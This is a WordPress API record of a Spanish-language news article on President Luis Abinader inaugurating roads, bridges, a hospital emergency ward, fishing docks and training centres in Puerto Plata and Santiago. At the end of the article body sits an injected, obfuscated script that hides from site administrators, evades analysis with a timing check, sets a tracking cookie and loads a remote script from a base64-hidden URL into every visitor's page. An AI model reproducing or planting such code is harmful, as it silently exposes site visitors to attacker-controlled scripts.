{"id":13192,"date":"2023-01-10T09:48:48","date_gmt":"2023-01-10T13:48:48","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13192"},"modified":"2023-01-10T09:48:48","modified_gmt":"2023-01-10T13:48:48","slug":"presidente-abinader-deja-inauguradas-ocho-obras-en-puerto-plata-y-una-en-santiago","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13192","title":{"rendered":"Presidente Abinader deja inauguradas ocho obras en Puerto Plata y una en Santiago"},"content":{"rendered":"<p>Puerto Plata.- En lo que ser\u00e1 un\u00a0<strong>a\u00f1o de muchas inauguraciones<\/strong>\u00a0de importantes obras por todo el territorio nacional, el\u00a0<strong>Presidente Luis Abinader<\/strong>\u00a0inici\u00f3 este 2023 con\u00a0<strong>ocho en Puerto Plata y una en Santiago<\/strong>.<\/p>\n<p>Durante su recorrido por la\u00a0<strong>Novia del Atl\u00e1ntico<\/strong>, provincia Puerto Plata, las obras entregadas por el mandatario rondan los\u00a0<strong>730.5 millones de pesos<\/strong>.<\/p>\n<p>Entre esas obras, las de mayor inversi\u00f3n corresponde a la reconstrucci\u00f3n de la\u00a0<strong>carretera que conecta el municipio de Villa Isabela con el distrito municipal Isabela Hist\u00f3rica y los puentes de Bajabonico y Unijica<\/strong>, as\u00ed como el asfaltado de las calles, construcci\u00f3n y reparaci\u00f3n de aceras y contenes por unos\u00a0<strong>560 millones de pesos.<\/strong><\/p>\n<p>La carretera fue reconstruida con una inversi\u00f3n de\u00a0<strong>210 millones de pesos<\/strong>, mientras que los puentes de Unijica y Bajabonico tuvieron una inversi\u00f3n de\u00a0<strong>230 millones\u00a0<\/strong>de pesos, impactando de manera directa el municipio de Villa Isabela, donde habitan unos 20,000 habitantes y\u00a0<strong>acuden miles de visitantes locales y turistas cada a\u00f1o.<\/strong><\/p>\n<p>Tambi\u00e9n se anunci\u00f3 la construcci\u00f3n y\u00a0<strong>reconstrucci\u00f3n de aceras, badenes, imbornales y contenes por 120 millones de pesos<\/strong>, de los cuales 20 millones ser\u00e1n destinados a Villa Isabela.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/94CAE527-3510-4DCD-8520-DA2D6F2BC9AF.jpg\" alt=\"\" width=\"1280\" height=\"853\" data-entity-type=\"file\" data-entity-uuid=\"7c350338-396a-4688-91cd-201317c78aba\" \/><\/p>\n<p>De igual forma, el Presidente Abinader dej\u00f3 inaugurado el remozamiento y ampliaci\u00f3n del \u00e1rea de Emergencia del hospital p\u00fablico de\u00a0<strong>Imbert<\/strong>, con una inversi\u00f3n superior a los\u00a0<strong>73.5 millones de pesos y<\/strong>\u00a0que beneficiar\u00e1 a m\u00e1s de 22,000 habitantes.<\/p>\n<p>As\u00ed mismo, inaugur\u00f3 los\u00a0<strong>muelles pesqueros y de veleros de Bah\u00eda Luper\u00f3n<\/strong>, con una inversi\u00f3n de\u00a0<strong>11 millones de pesos<\/strong>, como iniciativa que permitir\u00e1 renovar e impulsar la actividad pesquera de la zona y\u00a0<strong>dinamizar la econom\u00eda local.<\/strong><\/p>\n<p>En cuanto a capacitaci\u00f3n tecnol\u00f3gica, el jefe de estado inaugur\u00f3 un\u00a0<strong>Centro Tecnol\u00f3gico Comunitario (CTC), en Imbert<\/strong>, en el que tambi\u00e9n funcionar\u00e1 el programa\u00a0<strong>\u201cOportunidad 14-24\u201d\u00a0<\/strong>y un nuevo\u00a0<strong>Centro Tecnol\u00f3gico de Capacitaci\u00f3n del INFOTEP<\/strong>, este \u00faltimo construido con un monto de m\u00e1s de\u00a0<strong>46 millones de pesos.<\/strong><\/p>\n<p>Tambi\u00e9n encabez\u00f3 la inauguraci\u00f3n del\u00a0<strong>play Profesor Enrique Aquiles Polanco<\/strong>\u00a0en la misma localidad, con una inversi\u00f3n aproximada de\u00a0<strong>20 millones de pesos<\/strong>, que incluye el arreglo de las calles perif\u00e9ricas.<\/p>\n<p>En tanto, en el municipio de Luper\u00f3n tuvo lugar la\u00a0<strong>primera jornada de inclusi\u00f3n social \u00abPrimero T\u00fa\u00bb de este 2023<\/strong>, donde fueron beneficiadas m\u00e1s de 2,000 personas en condiciones de vulnerabilidad y pobreza extrema en un\u00a0<strong>esfuerzo del Gobierno central para llevar dignidad y mejores oportunidades a los m\u00e1s necesitados.<\/strong><\/p>\n<p>La jornada incluy\u00f3 tambi\u00e9n la visita del Presidente Luis Abinader a los trabajos de remozamiento del\u00a0<strong>Parque Arqueol\u00f3gico La Isabela Hist\u00f3rica<\/strong>\u00a0que abarca sus 17 edificaciones, e inaugur\u00f3 la\u00a0<strong>parroquia Santa Isabela<\/strong>, para la cual el gobierno ha realizado un\u00a0<strong>aporte aproximado de 20 millones de pesos.<\/strong><\/p>\n<p>En diversos puntos de su recorrido, el mandatario hizo uso de la palabra, resaltando, en el\u00a0<strong>\u00e1mbito educativo<\/strong>, que con la inauguraci\u00f3n de los centros de capacitaci\u00f3n t\u00e9cnica, se impartir\u00e1n\u00a0<strong>\u201ccarreras especializadas para que los j\u00f3venes puedan encontrar trabajo r\u00e1pidamente\u201d\u00a0<\/strong>y aprovechar las oportunidades que se est\u00e1n creando en los\u00a0<strong>sectores de turismo, zonas francas, turismo inmobiliario y otras industrias.<\/strong><\/p>\n<p>Mientras, al dejar en funcionamiento la Emergencia del Hospital Municipal de Imbert, puntualiz\u00f3\u00a0<strong>el aumento hecho al sector de salud de un 1.5 % del Producto Interno Bruto (PIB)<\/strong>\u00a0para atender las prioridades que tiene la naci\u00f3n dominicana.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/EF32949F-D426-4A6B-8D5B-38C8F807F24E.jpg\" alt=\"\" width=\"1600\" height=\"1066\" data-entity-type=\"file\" data-entity-uuid=\"cbf7a5ec-1c0c-491f-b2f2-178010084c90\" \/><\/p>\n<p><strong>Autopista Joaqu\u00edn Balaguer<\/strong><\/p>\n<p>Durante la jornada del domingo en Santiago, el jefe de Estado encabez\u00f3 la\u00a0<strong>inauguraci\u00f3n de la remodelada autopista Joaqu\u00edn Balaguer que une el tramo Santiago-Navarrete<\/strong>, as\u00ed como puentes y construcci\u00f3n de aceras, contenes y asfaltado con una\u00a0<strong>inversi\u00f3n superior a los 978 millones de pesos.<\/strong><\/p>\n<p>Estuvieron presentes, Claritza Rochtte, gobernadora de Puerto Plata; la senadora Ginette Bournigal; el Ministro Administrativo de la Presidencia, Jos\u00e9 Ignacio Paliza; el de Obras P\u00fablicas, Deligne Ascensi\u00f3n; el viceministro administrativo y financiero de la Presidencia, Igor Rodr\u00edguez; el directore del SNS, Mario Lama; el del Gabinete de Pol\u00edtica Social, Tony Pe\u00f1a; el de la Comisi\u00f3n Presidencial de Apoyo al Desarrollo Barrial, \u00c1ngel de la Cruz; del programa \u201cOportunidad 14-24\u201d, Alex Mord\u00e1n, y de los CTC, Isidro Torres, entre otros.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Puerto Plata.- En lo que ser\u00e1 un\u00a0a\u00f1o de muchas inauguraciones\u00a0de importantes obras por todo el territorio nacional, el\u00a0Presidente Luis Abinader\u00a0inici\u00f3 este 2023 con\u00a0ocho en Puerto Plata y una en Santiago. Durante su recorrido por la\u00a0Novia del Atl\u00e1ntico, provincia Puerto Plata, las obras entregadas por el mandatario rondan los\u00a0730.5 millones de pesos. Entre esas obras, las [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13194,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13192","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13192"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13192\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13194"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13192"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}